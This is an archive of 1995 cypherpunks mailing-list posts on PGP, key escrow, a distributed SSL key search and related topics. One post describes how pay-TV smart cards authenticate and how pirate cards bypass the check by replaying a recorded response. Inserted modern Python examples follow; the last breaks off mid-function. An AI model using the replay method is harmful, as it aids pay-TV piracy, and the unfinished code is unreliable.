Message-ID: <199509010332.XAA08009@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



The encrypted filesystem I promised never came through, partly because I've
been busy but also because I'm toying with writing it for OS/2 instead... 
alas I know little about OS/2.

Either way, the encryption/decryption routines are nicely written, and I am
willing to make them available for perusal either way (they're written in 386
Assembler code).

Drop me a note if you're interested.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Fri, 1 Sep 95 00:11:55 PDT
To: "cypherpunks@toad.com>
Subject: Karl Hess meeting - L.A. area
Message-ID: <199509010711.AAA09927@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me  
remind you, moderation in the pursuit of justice is no virtue." 
 -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. 
Politically Barry's Boy, Karl was often credited with Goldwater's 
most famous line, but he denied it when interviewed. Karl did write  
books: Dear America, Community Technology, and Capitalism For Kids. 
 
     ---  T H E   K A R L   H E S S   C L U B  --- 
now in its second year of almost monthly dinners, presents 

The Perestroika Deception: The Phony "Collapse" of Communism

September's speaker is William (Bill) McIlhany, who will speak on  
Conspiracy Theory of the Soviet collapse, and may answer some 
questions about the Chemical Bank Takeover of Chase Manhattan,
if we ask real nice. 

The Karl Hess Club will meet Monday, September 18 at the Marie 
Callendar Restaurant in Marina Del Rey 4356 Lincoln Boulevard 
(at the 90 Fwy). 

The program is free of charge, but if you care to dine, $13.00 
covers everything including tax and tip, with the exception of 
alcoholic beverages.

Cocktails at 7pm, Dinner at 7:30pm, Speaker at 8:30pm. 
Dinner: $13.00 includes all you can eat buffet with Marie's 
Pot Roast. Vegetable, Salad Bar, Potato, Cornbread, Apple, Lemon 
and Pumpkin Pies plus (Soft) beverages included. Order alcoholic 
beverages on your own, cash & carry. 
 
No reservations are necessary, but for more information, you are 
welcome to contact Mike Everling at (213) 225-3405. 
 
In order to get to the restaurant, take the Marina (90) Freeway 
West until it ends at Lincoln Boulevard. Turn right at Lincoln 
and right again into the parking lot of the restaurant- it's 
just at the corner. Inside the restaurant, go upstairs to the 
meeting room.  
 
The program for October 16 is still in development. The venue 
will again be Marie Callendar in MDR, with the tentatively 
scheduled speaker to be Dr. John Hospers. 
 
Want to make sure you are on the Karl Hess Club mailing list? 
Leave a message at (310) 289-4126, e-mail at agorist003@aol.com, 
or write The Agorist Institute, 291 S. La Cienega Blvd., #749, 
Beverly Hills, CA 90211. 

Browse our Web page -- http://www.pinsight.com/~zeus/agorist/
For tax deduction, make donations payable to The Agorist Institute.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEYh6zTxxI221vktAQFYDwP/chaMpCMb8kxpg2oo/AOi+ybiZFe5KQCY
dJa8LKskqz6usBCuClhWfhvsyfwt5LOg3v9B8yRLiQR8kjHuUWNjkxY8WwsRUi3C
NKGW33EeplPEg2Rpv/pxWYqNICfYQa6j9xAUVPSPZbJD9HrWM+sJ7uJGuLMY0p48
4u/vppPSyHU=
=bvnM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Thu, 31 Aug 95 23:14:44 PDT
To: cypherpunks@toad.com
Subject: Hmmm.. (fwd)
Message-ID: <199509010555.AAA20955@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


In a previous message, Jamie Rishaw said...

This was from one of the discussion groups concerning InterNIC's operation
of the whois services, registration services, etc.  I found it quite
interesting that they were logging this sort of information.

Bryan

> From owner-rs-talk@internic.net  Fri Sep  1 00:47:14 1995
> Message-Id: <m0soE5J-001dv0C@sauron.multiverse.com>
> From: jamie@sauron.multiverse.com (Jamie Rishaw)
> Subject: Hmmm..
> To: rs-talk@internic.net
> Date: Thu, 31 Aug 1995 14:11:28 -0400 (EDT)
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> Content-Length:        343
> Sender: owner-rs-talk@internic.net
> 
> What's this?
> 
> melkor% whois seaway.com                                                  ~/nic
> crt0: no /usr/lib/ld.so
>  
> Could not open log file [/home/guest/guest/logs/whoisrv.log]
> 
> 
> Does NIC log all the WHOIS requests?  Why?
> 
> 
> -- 
> jamie rishaw (jamie@multiverse.net)
> 
> "Hey!  Who took the cork off my lunch??!"
>                 -- W. C. Fields
> 


-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 31 Aug 95 21:58:14 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <v02130506ac6c253a5e59@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:50 8/30/95, MONTY HARDER wrote:
>I recommend that anyone who will be using escrowed keys generate two
>pairs: First, the signature key, including in the userid some kind of
>[sig use] identifier (we should settle on a standard abbreviation for
>this) followed by the encryption key. This way, when a person gets your
>pubkeys, they get the encryption key =last=, which gets it searched
>first whenever they PGP -e... something.
>
>  Whatever arrangements are made for escrowing my encryption key,
>=nobody= gets my signature key. If I am fired, quit, become brain
>damaged or dead, my key can never be used by anyone to implicate me in
>any criminal activity.
>
>
>
>  Please don't mention to anyone the fact that my signature key can be
>used to send me something that even the escrow agents can't read....

I do not think that PGP 2.x can easily (ie: Automatically) use one key for
Signing and another for Encrypting a Message (it does both at the same time
if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
the result but I'm not sure if doing the decrypt on such a message will
automatically spot the signature and verify it (as would occur with a E+S
pass).

PGP3 is supposed to have the ability to have keysets that contain two keys
for this purpose (ie: When you generate a key set you can ask it to
generate separate Sign and Encrypt keys so that separate keys get used for
each function).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 31 Aug 95 21:58:44 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL search attack
Message-ID: <v02130508ac6c2efca958@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 8/31/95, Piete Brooks wrote:
> I am against pre-fetching of the next chunk, as I believe it should not be
>        necessary (I'll review that after Hal3) and it tends to increase NOACKs

I see nothing wrong with the concept of being allocated an initial chunk
and having the scan software attempt to ACK it when 50% of it has been
searched. A successful ACK would allow the releasing of a new chunk (in
response) equal in size to the returned chunk. A failure of the Server to
accept the ACK would trigger a retry at set intervals (such as 75% and 100%
or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
in possession of a Full Sized Chunk to scan (so long as the Server accepts
an ACK before the 100% done mark) and temporary failures will not stop the
process of a scanner as currently happens.

Note: All this does is alter the size of the initial chunk granted and
allow the scanner to report partial progress and reset the scanned range
back to the original chunk size (ie: The Scanner never has more than the
designated assigned chunk size at any time - it just gets refreshed in
pieces [thus allowing overlap of scanning with getting a new range to scan]
in lieu of all at once [which has a failure to accept the ACK as a bottle
neck in uninterrupted scanning]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 31 Aug 95 23:17:08 PDT
To: perry@piermont.com
Subject: Re: sums with BIG numbers
In-Reply-To: <199509010555.BAA25418@frankenstein.piermont.com>
Message-ID: <199509010620.BAA00211@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> Sherry Mayo writes:
> > Can anyone point me to any books, documentation or
> > whatever that will explain the methods used in routines
> > like bignum for doing sums with 'too-big' numbers.
> > 
> > I'm having a tough time trying to figure it out from the code 
> > ;-(
> 
> The best book to read is, of course, Volume 2 of Knuth's "Art of
> Computer Programming". Many of the algorithms in use today are a bit
> snazzier but Knuth explains all the general principles of how such
> things are done.
> 
> BTW, any good hacker should own all three published volumes. It's *the*
> classic.
> 
> Perry
> 

Volume 4 should be in print shortly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kooltek@iol.ie (jmcc)
Date: Thu, 31 Aug 95 17:34:35 PDT
To: cypherpunks@toad.com
Subject: Re: Fiat Shamir Zero Knowledge Test
Message-ID: <199509010028.BAA06686@joyce.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>Can someone point me to a net description of
>the "Fiat Shamir Zero Knowledge Test" used
>in the RCA DirecTV smart cards.
>

The standard text on this is the paper "How To Prove Yourself" by Fiat and
Shamir. I'll try and dig up the name of the ftp site I found it on but in
the meantime here is a rough description.

The access control system for RCA DirecTv was developed by News Datacom.
They, News Datacom, also developed the security for the VideoCrypt system
here in Europe. The smart card used in VideoCrypt here in Europe has been
continually reverse-engineered for the last three card issues. (currently on
issue 09). Therefore much of the description below is based on the European
system. Of course the fact that the DSS cards are now turning up in Europe
repainted as Sky cards indicates that the ROM is identical. This is where
the routines for card i/o protocols and data packets are. As a result, the
DirecTv system probably uses the same packet types. Any of the pirate smart
card emulator programs available on BBSes or FTP sites can be used to
monitor the data flowing to and from the card. Cutting to the chase:

Packet  Direction  Bytes  Function
70      C > D       6     Card presents 6 byte ID number to decoder
7C      C > D      16     Card sends tiering/authorisation levels to decoder
7E      C > D      64     Card sends X value for ZKT to decoder
80      D > C       1     Decoder sends Q flag to card (either 00h or 01h)
82      C > D      64     Card's Y ZKT response to decoder
70      C > D       6     Card presents 6 byte ID number to decoder


The Fiat Shamir ZKT as used in here is dependent on a number of elements:
S, the serial number of the card. 
N, the common modulus. 
R, the look-up table in the card (a block of data).
X, the value sent by the card to be authenticated.
Q, the calculation mode flag (either 00h or 01h)
Y, the calculated response from the card.

The X value is calculated as X=R^2 mod N. The Y responses are calculated as
follows.

 Y = R if Q=00h
 Y = (R * S) mod N if Q=01h

The Q flag tells the card how to generate response Y. The card would be
authenticated in the following cases:

If Q=00h then Y^2 = X mod N

If Q=01h then Y^2 = (X * V) mod N where V is the card identity number
received prior to the authentication process. S, the card serial number is
derived from V by the equation: S = sqrt (V) mod N

The implementation of the ZKT in VideoCrypt is faulty and open to a simple
hack. It is designed to make the card authenticate itself. Many of the
earlier decoders had a flaw in the ZKT calculation routines in the decoder.
Of course the data in the decoder was easily popped by hackers since the
microcontroller in charge of the authentication was not secured.

In the VideoCrypt system, one of the latest bypasses for the ZKT is to
record the response from a valid card and have the pirate card replay it.
This saves a lot of time and it does work perfectly.

Since the complete contents, (ROM and EEPROM), of the VideoCrypt card are
now available, the whole idea of authentication is invalid. In the DSS
system, however, the ZKT is still viable though there are some ways in
which it theoretically could  be bypassed if it uses the same implementation
as VideoCrypt.

Regards...jmcc
(John McCormac)
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAYiFIAAAEEANTTBXIijEE82VN6nL7U+Or0Br4/eJ6POKxfxy64GOJsEO7g
kPrAI3zzuYZ4XhOH01Lt4dtr+0hmanMpKOssYR02sZGaR6OARWSRe9KIWpSUGHG3
8pBBCqYO6adzFEVEOclqDQ1L6QZaOsf+qX8h9eo/bXpeYg43PZvSRmmL6lExAAUR
tA5rb29sdGVrQGlvbC5pZQ==
=vzc/
-----END PGP PUBLIC KEY BLOCK-----
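
The round described in the post above (X = R^2 mod N, Q flag, Y response, and the decoder's check), as an added example that is not part of the original post and is not VideoCrypt or DSS code. The toy modulus, the class and function names, and the use of several rounds with an injectable challenge list are assumptions made here; the example shows from the decoder's side why a recorded response only verifies when the Q flags repeat.

```python
import secrets
from math import gcd

# Constructed toy modulus (two small primes). The 64-byte X and Y packets
# in the post imply a modulus of roughly 512 bits in the real system.
N = 1019 * 1031


class Card:
    """Prover that knows S, where V = S^2 mod N is its public identity."""

    def __init__(self, s):
        self.s = s % N
        self.v = pow(self.s, 2, N)
        self._r = None

    def commit(self):
        # Fresh R per round: answering both Q values for one R would reveal S.
        while True:
            r = secrets.randbelow(N - 2) + 2
            if gcd(r, N) == 1:
                break
        self._r = r
        return pow(r, 2, N)                      # X = R^2 mod N

    def respond(self, q):
        r, self._r = self._r, None               # one answer per commitment
        if r is None:
            raise RuntimeError("respond() called without commit()")
        return r if q == 0 else (r * self.s) % N  # Y = R or Y = R*S mod N


class RecordedTranscript:
    """Test fixture: plays back (X, Y) pairs captured from earlier rounds."""

    def __init__(self, pairs):
        self._pairs = list(pairs)
        self._i = 0

    def commit(self):
        return self._pairs[self._i][0]

    def respond(self, q):
        y = self._pairs[self._i][1]              # ignores q: it has no secret
        self._i += 1
        return y


def check_round(x, q, y, v):
    """Decoder check: Y^2 = X (Q=0) or Y^2 = X*V (Q=1), all mod N."""
    if q not in (0, 1) or gcd(x, N) != 1:
        return False                             # X = 0 would verify for anyone
    expected = x if q == 0 else (x * v) % N
    return pow(y, 2, N) == expected


def authenticate(prover, v, challenges):
    """Run one round per challenge bit; accept only if every round verifies."""
    transcript = []
    for q in challenges:
        x = prover.commit()
        y = prover.respond(q)
        if not check_round(x, q, y, v):
            return False, transcript
        transcript.append((x, q, y))
    return True, transcript


def fresh_challenges(rounds):
    """Unpredictable Q flags; a playback then survives with chance 2**-rounds."""
    return [secrets.randbits(1) for _ in range(rounds)]


def demo():
    card = Card(123457)                          # constructed secret S
    first = [1, 0, 1, 1, 0, 1, 0, 0]
    genuine_ok, recorded = authenticate(card, card.v, first)
    pairs = [(x, y) for x, _, y in recorded]
    # Decoder that repeats its Q flags: the playback verifies.
    repeated_ok, _ = authenticate(RecordedTranscript(pairs), card.v, first)
    # Decoder whose fourth Q flag differs: the playback fails at that round.
    changed = [1, 0, 1, 0, 0, 1, 0, 0]
    changed_ok, _ = authenticate(RecordedTranscript(pairs), card.v, changed)
    return genuine_ok, repeated_ok, changed_ok


if __name__ == "__main__":
    print(demo())
```

A decoder that draws its Q flags with fresh_challenges() and requires every round to pass leaves a playback device guessing each flag in advance.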





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 22:56:24 PDT
To: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010555.BAA25418@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sherry Mayo writes:
> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.
> 
> I'm having a tough time trying to figure it out from the code 
> ;-(

The best book to read is, of course, Volume 2 of Knuth's "Art of
Computer Programming". Many of the algorithms in use today are a bit
snazzier but Knuth explains all the general principles of how such
things are done.

BTW, any good hacker should own all three published volumes. It's *the*
classic.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:14:48 PDT
To: cypherpunks@toad.com
Subject: FUHRMAN key escrow
Message-ID: <199509011002.FAA28046@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                   FUHRMAN key escrow

   Fuhrman seems to be a Godsend to us. He is helping to destroy the
public's perceived legitimacy of state authority. If things keep moving
the way they are, Fuhrman may join the names: John Crapper, Quisling,
& Hooker. In which case, I propose the term, Fuhrman key escrow, to
substitute for the term, mandatory state key escrow.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 1 Sep 95 00:17:18 PDT
To: cypherpunks@toad.com
Subject: Phil Zimmermann/Amnesty International?
Message-ID: <199509011005.FAA28054@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


         Phil Zimmermann/Amnesty International?

   I was wondering if the Zimmermann case would be a proper concern of
Amnesty International. Phil is obviously a political dissident. His
persecution is obviously political. If Phil got support from Amnesty
Int'l, then his persecution could be a big embarrassment to the Federal
gov't. He has a lot of supporters and taking up his cause could be a
big promotional for Amnesty International. The Feds might feel forced
to drop the matter early. Any ideas?

                                             Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 1 Sep 95 06:00:13 PDT
To: cypherpunks@toad.com
Subject: Web of Trust
Message-ID: <199509011201.GAA01376@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am currently sorting through the PGP keyserver keyfile to extract a
limited web of trust. I believe that current servers would be best to
limit their keys in a similar fashion. Since we can't all have what we want
without coding it ourselves, I'm doing the next best crappy imitation.
Anyways, I am trying to find keys that are actually relevant and
inter-connected with signatures. Naturally, it won't be anywhere near
complete or extensive, and will be a dog to update, but 5 meg keyfiles
take a long time to search... 

I am requesting that all "active" cypherpunks/cyphergroupies please send me
their key number, IF it's already on the keyservers. If it's recently put
there, be sure to tell me or I will be annoyed. If it's not there at all,
I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If
you searched any of the RC4 or SSL keyspace, for example, I'm interested.
If you post messages occasionally, [conspiracypunks need not apply] I'm
interested. If you generated a key because your neighbor taught you how,
don't bother. 

If anyone wants the keynumbers/script/entirekeyfile I could put it on
ftp or something. Naturally, I'll be forwarding all results to the NSA 
quantum crack-o-matic. Have a nice day. :)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEb1A8La+QKZS485AQGMKwL/Qzf67QSnn3iLZ7gCumfPcC/KqSyYSM0s
OknMHhGDLb74qSWBDRyM6pPdwIHOg+Pjpl53ruMSu9YhXQrjMHgZZUjFh6c7vhi2
c+j3BYQ87us0BRuoj9pu8/d89gG3vsv3
=3qRz
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Sep 95 04:09:58 PDT
To: ravage@einstein.ssz.com
Subject: Re: sums with BIG numbers
Message-ID: <9509011109.AA15900@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Volume 4 should be in print shortly.
All of Volume 4 or the first couple-hundred pages as a fascicle?
Or have those plans changed?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gjeffers@socketis.net)
Date: Wed, 20 Sep 95 17:17:36 PDT
To: cypherpunks@toad.com
Subject: PHIL ZIMMERMANN/AMNESTY INTERNATIONAL?
Message-ID: <9509201546525457@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 01 Sep 1995 02:16:20 -0500
To: cypherpunks@toad.com
From: gjeffers@socketis.net (Gary Jeffers)
Subject: Phil Zimmermann/Amnesty International?

         Phil Zimmermann/Amnesty International?

   I was wondering if the Zimmermann case would be a proper concern of
Amnesty International. Phil is obviously a political dissident. His
persecution is obviously political. If Phil got support from Amnesty
Int'l, then his persecution could be a big embarrassment to the Federal
gov't. He has a lot of supporters and taking up his cause could be a
big promotional for Amnesty International. The Feds might feel forced
to drop the matter early. Any ideas?

                                             Gary Jeffers
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 05:27:47 PDT
To: hal9001@panix.com
Subject: Re: SSL search attack
Message-ID: <9509011225.AA20540@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk. A failure of the Server to
> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> in possession of a Full Sized Chunk to scan (so long as the Server accepts
> an ACK before the 100% done mark) and temporary failures will not stop the
> process of a scanner as currently happens.
> 

The only way this can work is if the server is told it is a 50%/75%/etc
size ACK, and then later the server is ACKed for the full 100%. 

Why?  Because what happens if the client dies immediately after doing 
the ACK - maybe only 51% of that space has been searched, yet 
the server has already seen an ACK for it.


IMO - a % ACK is too much complexity and extra work on the server,
which is already having trouble keeping up.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 1 Sep 95 04:39:57 PDT
To: starrd@iia2.org (starrd)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <Pine.BSD.3.91.950831174002.16046A-100000@usr1.primenet.com>
Message-ID: <95Sep1.073743edt.1421@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I am a user of SecureDrive, and strongly support it.   There is *no* 
> interface required, once you log into the drive, *everything* operates 
> totally transparent to the user.
I used to use it too.  Sure, once you've got it set up and automated,
it's transparent.  But can you see J. Random User installing it?

> Always keep in mind that when the gov't doesn't mind the software being 
> exported, they already know how to compromise it...Trust PGP, Hpack & 
> SecureDrive...you won't be disappointed.
When last I looked, your government didn't allow the export of 80-bit
cryptosystems.  There is no argument that the 40-bit export version
is breakable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Fri, 1 Sep 95 06:13:28 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
Message-ID: <v02130500ac6cb126c323@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
>>
>> I see nothing wrong with the concept of being allocated an initial chunk
>> and having the scan software attempt to ACK it when 50% of it has been
>> searched. A successful ACK would allow the releasing of a new chunk (in
>> response) equal in size to the returned chunk. A failure of the Server to
>> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
>> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
>> in possession of a Full Sized Chunk to scan (so long as the Server accepts
>> an ACK before the 100% done mark) and temporary failures will not stop the
>> process of a scanner as currently happens.
>>
>
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then later the server is ACKed for the full 100%.
>
>Why?  Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.

You NEVER claim to have searched space until you have actually done so.

>IMO - a % ACK is too much complexity and extra work on the server,
>which is already having trouble keeping up.
No. The claim is that the server has no problem keeping up with acks.
Besides, if it does, we simply insert a layer of "managers" to buffer the
top management from being "bothered" too often.

You are making the "ACK" too complicated.
Assuming that you are multi-threaded--- Simply run two "workers" on the
same machine. If there are delays in getting keys assigned, the two will
soon get out of phase and keep the cpu busy.

----
Richard Wackerbarth
rkw@dataplex.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Sep 95 06:27:10 PDT
To: rkw@dataplex.net
Subject: Re: SSL search attack
Message-ID: <9509011325.AA20856@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 7:25 AM 9/1/95, Daniel R. Oelke wrote:
> >>
> >> I see nothing wrong with the concept of being allocated an initial chunk
> >> and having the scan software attempt to ACK it when 50% of it has been
> >> searched. A successful ACK would allow the releasing of a new chunk (in
> >> response) equal in size to the returned chunk. A failure of the Server to
> >> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> >> in possession of a Full Sized Chunk to scan (so long as the Server accepts
> >> an ACK before the 100% done mark) and temporary failures will not stop the
> >> process of a scanner as currently happens.
> >>
> >
> >The only way this can work is if the server is told it is a 50%/75%/etc
> >size ACK, and then later the server is ACKed for the full 100%.
> >
> >Why?  Because what happens if the client dies immediately after doing
> >the ACK - maybe only 51% of that space has been searched, yet
> >the server has already seen an ACK for it.
> 
> You NEVER claim to have searched space until you have actually done so.

That is exactly what I was arguing against - but the first sentence of what
I quoted was saying was ok.


> Assuming that you are multi-threaded--- Simply run two "workers" on the
> same machine. If there are delays in getting keys assigned, the two will
> soon get out of phase and keep the cpu busy.
> 

I kind of like that idea...

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 10:12:16 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509011708.KAA11228@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner's example has fairly close analogies today.
Corporations, cash, and assets with variable value are already useful.

Alice is the dying parent who runs a business or has a good credit-rating.
Bob is the irresponsible kid, Carol is the about-to-be unlucky creditor.
Alice borrows lots of money from Carol, tells Bob that it's in the
mattress / numbered Swiss Bank Account / collection of $$$$ artwork at home.
Alice dies, and Bob absconds with the money (probate isn't needed for
Swiss bank accounts or unrecorded stuff in mattresses) or sells the paintings
to the highest bidder of Dave, Eve, and Freddie (with a bribe to all of them,
and a kickback from Dave when he finally sells the painting for its real value.)
(Or maybe it's not bribery and kickbacks, he's just a major shareholder
in the Glorkspitz corporation, which is a major shareholder in their
businesses.)

Carol is stuck trying to get money out of The Alice Estate, which turns
out to be surprisingly broke.  If she lent the money to The Alice Company
(which looks more creditworthy than Chronologically Challenged Widow Alice),
Alice would have had to leave Bob the yellow-sticky with the store safe
combination instead of leaving the cash in her mattress.

Now, one reason we have probate courts is to try to stop this sort of fraud,
making sure creditors get paid and heirs get their shares.  Another reason,
of course, is to make sure "Uncle" Sammy gets to inherit part of it,
even though he's not a relative.  (That's of course one of the reasons for
having Swiss bank accounts you didn't remember to mention on your tax forms,
fireproof mattresses, foreign corporations, and friends in the art dealer
business :-)

Does good anonymity make this easier?  Sure.  And if all the heirs are
cooperative, they can conspire to rip off their parents' creditors, if
they're dishonest, or at least to avoid taxes, if they're not tax-believers.
Of course, if they're dishonest, they'll have plenty of opportunities without
having anybody die, and that'll probably affect bankruptcy law and increase
Federal self-justification for watching the money supply long before
anonymous estate ripoffs become common.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 10:12:06 PDT
To: cypherpunks@toad.com
Subject: Re: opinions on RSA Secure?
Message-ID: <199509011708.KAA11239@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> The fact that the key is only 80 is *major* compromise.  I would 
>> recommend that package to no-one.   With only a 80 bit key you don't 
>> *need* trapdoors, granted they may be more "convenient" but the fact is 
>> the 80 key *can* [and certainly will] be broken...

80 is an interesting number.  Clipper-sized :-)  It's much less than 128,
which seems to be popular for other software and works well with MD5-based
random session key generators.  It's also interestingly bigger than 64,
which the Feds are trying to tell us is good enough for non-government work.
Are RSA giving in to the Feds?  Or are they trying to up the bid, at least 
allowing us something as good as Clipper if we can't get 128?  Not my poker
game.

Let's look at some threat models.
It's probably more than strong enough for any data you're willing to keep
on a machine running MS-DOS, where serious attackers will go around it;
it's about right for random "left your laptop in the airport" security,
and for business use, if the police are going to confiscate your machine,
they can probably subpoena the keys from somebody in your company anyway.
Random hackers aren't going to be able to crack it, unlike 40-48 or maybe 56.

It's big enough that the NSA probably can't break it right now,
but in 10-20 years of computer speed growth they'll be able to if they want.
It's probably fine for dealing with amounts less than $1-100M for maybe 10 years,
and for misdemeanors and light felonies if you're not using the key escrow :-)
And in 5 years, you'll be using a different operating system (even if it _is_
named "Windows"), so you'll need a new version, and you can re-encrypt your data
when you move it to a decent-sized disk instead of that wimpy 9GB mechanical drive.
Anybody who's got a 5-year-old dump of your system has probably stolen any
secrets you care about long since anyway.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
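
The time-versus-key-size reasoning in the message above can be carried through as a calculation. This is an added example, not part of the original post; the search rates and the 1.5-year doubling period are assumed values chosen only to show the method, and the key sizes are the ones the post mentions.

```python
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Assumed attacker speeds in key trials per second (illustrative, not measured).
ATTACKERS = {"hobbyist": 1e6, "well-funded": 1e12}
KEY_SIZES = [40, 48, 56, 64, 80, 128]  # sizes named in the post


def years_to_search(bits, rate_now, doubling_years=1.5):
    """Years until an attacker who starts today, and whose speed doubles every
    doubling_years, has tried half of a bits-bit keyspace (the expected work)."""
    expected_trials = 2 ** (bits - 1)
    # Trials completed by time T is the integral of rate_now * 2**(t/d) dt:
    #   rate_now * S * d / ln(2) * (2**(T/d) - 1)
    # Setting that equal to expected_trials and solving for T gives:
    scale = rate_now * SECONDS_PER_YEAR * doubling_years / math.log(2)
    return doubling_years * math.log2(1 + expected_trials / scale)


def outlasts(bits, rate_now, secrecy_years, doubling_years=1.5):
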